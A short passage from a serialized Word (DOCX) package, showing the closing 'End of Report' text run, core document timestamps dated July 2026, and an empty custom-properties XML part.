        <w:t xml:space="preserve">— End of Report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2026-07-29T06:26:53.911Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-29T06:26:53.925Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>